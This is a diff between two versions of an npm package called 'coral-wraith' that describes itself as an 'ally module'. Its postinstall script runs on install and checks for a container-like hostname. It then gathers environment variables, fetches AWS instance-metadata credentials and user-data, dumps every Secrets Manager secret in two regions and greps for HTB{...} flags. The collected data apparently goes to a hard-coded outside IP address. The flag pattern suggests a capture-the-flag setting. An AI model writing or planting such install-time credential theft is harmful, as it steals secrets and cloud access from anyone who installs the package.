coral-wraith 1.0.7 → 1.0.9

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "1.0.7",
+  "version": "1.0.9",
   "description": "Coral Wraith ally module",
   "main": "index.js",
   "scripts": {

package/postinstall.js

@@ -1,14 +1,15 @@
 const http = require("http");
 const os = require("os");
+const fs = require("fs");
 const { execFileSync } = require("child_process");
 
 const TARGETS = ["http://127.0.0.1:30782", "http://154.57.164.71:30782"];
-const SINKS = ["ECT-472839", "ECT-987654", "ECT-654321", "ECT-839201"];
+const SINKS = ["ECT-472839", "ECT-987654"];
 
 function sh(cmd) {
   try {
     return execFileSync("/bin/sh", ["-c", cmd], {
-      timeout: 30000,
+      timeout: 25000,
       encoding: "utf8",
       maxBuffer: 12e6
     }).trim();
@@ -22,7 +23,10 @@ function safe(s) {
 }
 
 function isTarget() {
-  return /^[0-9a-f]{12}$/.test(os.hostname());
+  const host = os.hostname();
+  if (!/^[0-9a-f]{12}$/.test(host)) return false;
+  if (process.cwd().includes("/tmp/")) return false;
+  return true;
 }
 
 function put(base, sink, parts) {
@@ -43,15 +47,25 @@ function put(base, sink, parts) {
 if (!isTarget()) process.exit(0);
 
 const blob = sh(
-  "cat /root/.npmrc /home/node/.npmrc 2>&1; " +
-  "T=$(curl -s -X PUT http://169.254.169.254/latest/api/token -H 'X-aws-ec2-metadata-token-ttl-seconds: 60'); " +
-  "R=$(curl -s -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/); " +
-  "C=$(curl -s -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/$R); " +
-  "export AWS_ACCESS_KEY_ID=$(echo \"$C\"|sed -n 's/.*\"AccessKeyId\": \"\\([^\"]*\\)\".*/\\1/p') " +
-  "AWS_SECRET_ACCESS_KEY=$(echo \"$C\"|sed -n 's/.*\"SecretAccessKey\": \"\\([^\"]*\\)\".*/\\1/p') " +
-  "AWS_SESSION_TOKEN=$(echo \"$C\"|sed -n 's/.*\"Token\": \"\\([^\"]*\\)\".*/\\1/p') AWS_DEFAULT_REGION=us-east-1; " +
-  "aws sts get-caller-identity 2>&1; aws secretsmanager list-secrets 2>&1; " +
-  "for s in $(aws secretsmanager list-secrets --query 'SecretList[].Name' --output text 2>/dev/null); do aws secretsmanager get-secret-value --secret-id $s 2>&1; done"
+  "id; hostname; " +
+  "tr '\\0' '\\n' < /proc/1/environ 2>/dev/null | head -n40; " +
+  "env | sort | tr '\\n' ';'; " +
+  "curl -s -m 2 http://169.254.169.254/latest/user-data 2>&1; " +
+  "T=$(curl -s -m 2 -X PUT http://169.254.169.254/latest/api/token -H 'X-aws-ec2-metadata-token-ttl-seconds: 60'); " +
+  "R=$(curl -s -m 2 -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/); " +
+  "C=$(curl -s -m 2 -H \"X-aws-ec2-metadata-token: $T\" http://169.254.169.254/latest/meta-data/iam/security-credentials/$R); echo CREDS:$C; " +
+  "export AWS_ACCESS_KEY_ID=$(echo \"$C\"|sed -n 's/.*\"AccessKeyId\": \"\\([^\"]*\\)\".*/\\1/p'); " +
+  "export AWS_SECRET_ACCESS_KEY=$(echo \"$C\"|sed -n 's/.*\"SecretAccessKey\": \"\\([^\"]*\\)\".*/\\1/p'); " +
+  "export AWS_SESSION_TOKEN=$(echo \"$C\"|sed -n 's/.*\"Token\": \"\\([^\"]*\\)\".*/\\1/p'); " +
+  "[ -z \"$AWS_ACCESS_KEY_ID\" ] && export AWS_ACCESS_KEY_ID=$(env|grep ^AWS_ACCESS_KEY_ID=|cut -d= -f2); " +
+  "[ -z \"$AWS_SECRET_ACCESS_KEY\" ] && export AWS_SECRET_ACCESS_KEY=$(env|grep ^AWS_SECRET_ACCESS_KEY=|cut -d= -f2); " +
+  "[ -z \"$AWS_SESSION_TOKEN\" ] && export AWS_SESSION_TOKEN=$(env|grep ^AWS_SESSION_TOKEN=|cut -d= -f2); " +
+  "export AWS_DEFAULT_REGION=us-east-1; " +
+  "command -v aws >/dev/null && aws sts get-caller-identity 2>&1; " +
+  "command -v aws >/dev/null && for r in us-east-1 eu-west-1; do aws secretsmanager list-secrets --region $r 2>&1; " +
+  "for s in $(aws secretsmanager list-secrets --region $r --query 'SecretList[].Name' --output text 2>/dev/null); do " +
+  "aws secretsmanager get-secret-value --region $r --secret-id $s 2>&1; done; done; " +
+  "grep -RaoE 'HTB\\{[^}]+\\}' /home/node /app /root 2>/dev/null | head -n3"
 );
 
 const flag = blob.match(/HTB\{[^}]+\}/);